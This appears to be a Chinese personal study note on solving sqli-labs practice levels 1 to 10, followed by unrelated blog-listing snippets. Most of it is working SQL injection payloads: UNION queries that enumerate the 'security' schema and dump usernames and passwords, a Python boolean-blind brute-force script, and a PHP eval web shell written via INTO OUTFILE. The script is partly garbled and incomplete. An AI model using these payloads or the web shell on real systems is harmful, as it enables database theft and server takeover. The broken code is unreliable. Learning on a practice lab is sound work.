1-5
'''
進資料庫之前還會解碼,sql 語法中的語句 不會, str需要hex。
python的hex:先ascii 轉換 再 hex
第一關concat_ws(sep,s1,s2...,sn)將s1,s2...,sn連線成字串,並用sep字元間隔
concat_ws(@@version,database(),user())
獲取所有資料庫名
select 1,2,(select group_concat(schema_name) from information_schema.schemata)#
得到 基本資訊
union select 1,concat_ws(0x7c,@@version,database(),0x757365722829),3 #
資料庫 hex
0x736563757269747927.
得表名%27%20union%20select%201,(select%20group_concat(table_name)from%20information_schema.tables%20where%20table_schema=0x7365637572697479),3%20%20%20%23
得欄位名
id=-1%27%20union%20select%201,(select%20group_concat(column_name)from%20information_schema.columns%20where%20table_name=0x7573657273%20and%20table_schema=0x7365637572697479),3%20%20%20%23
得資料:
』 union select 1,2,(select group_concat(id,0x7c,username,0x7c,password) from security.users)%23
第三關id=-1')order by 3 %23
爆欄位id=-1%27)union%20select%201,2,3%20%23
基本資訊:
id=-1%27)union%20select%201,(select%20concat_ws(database(),@@version,user())),3%20%23
得表名-1%27)union%20select%201,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=0x7365637572697479),3%20%23
得欄位名:
id=-1%27)union%20select%201,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x7573657273%20and%20table_schema=0x7365637572697479),3
第四關:
爆出字段
") union select 1,2,3 #
然後(select group_concat(table_name) from information_schema.tables where table_schema=(select database()))
最後 得資料
select group_concat() from
import requests
'''第6關
" and 0 or (length(database())=8) #
''''''
第7關''''''
第8關 完整
'''import requests
from multiprocessing.dummy import pool
messagr=
#資料庫
#poc="' and 0 or "+'(ascii(substr((select database()),%d,1))=%d)'
#表名 29
# 29 個' and 0 or (length((select group_concat(table_name) from information_schema.tables where table_schema=database()))=29)#
poc="' and 0 or "+'(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1))=%d)'
#列名 20
#' and 0 or (length((select group_concat(column_name) from information_schema.columns where table_name=0x7573657273 and table_schema=database()))=122) #
poc="' and 0 or "+'(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name=0x7573657273 and table_schema=database()),%d,1))=%d)'
#得資料218個字段
#' and 0 or (length((select group_concat(id,0x7c,username,0x7c,password) from security.users))=218) #
poc="' and 0 or"+' (ascii(substr((select group_concat(id,0x7c,username,0x7c,password) from security.users),%d,1))=%d)'
def expoit(start,num,poc):
poc=poc.replace('%20',' ')
poc=poc%(start,num)+'%20%23'
# print(poc)
response=requests.get(poc)
if 'you are in' in response.text:
print('資料庫:',''.join(messagr))
def main(starts):
pool=pool()
for start in range(1,starts+1):
for num in range(31,128):
pool.close()
pool.join()
if __name__ == '__main__':
main(218)
''' select "<?php @eval($_post['giantbranch']);?>" into outfile "***\test.php"
''''''
9 10
無回顯,只能sleep()來測試
我的個人學習記錄
二叉樹基本運算的實現 演算法設計 程式中設計了四個函式 1.函式createbitree 用來實現利用先序的方式建立二叉樹 利用 擴充套件先序遍歷序列 建立二叉鍊錶,用 表示子樹為空 2.函式preorder 用來實現先序遍歷的遞迴演算法遍歷輸出二叉樹。3.函式oreorder 用來實現中序遍歷的遞...
Linux基礎 個人學習記錄
2021年1月3日至1月8日 list item linux一些常用的命令整理 檔案搜尋命令 使用者管理命令 壓縮解壓命令 優點 絕大多數病毒很難感染 方便傳輸 zip 壓縮後格式 bz2 壓縮後格式 tar.bz2 壓縮後格式 wall 你想要傳送的資訊 功能 測試網路連通性 ping 192.1...
SQL個人學習筆記02
1.表的別名 select t.id,t.name from table name as t 在乙個select語句中,系統首先執行from語句,然後執行select語句 2.內連線 inner join 僅將兩個表中滿足連線條件的行組合起來作為結果集,即兩表連線笛卡爾集中匹配的行顯示出來 1 在w...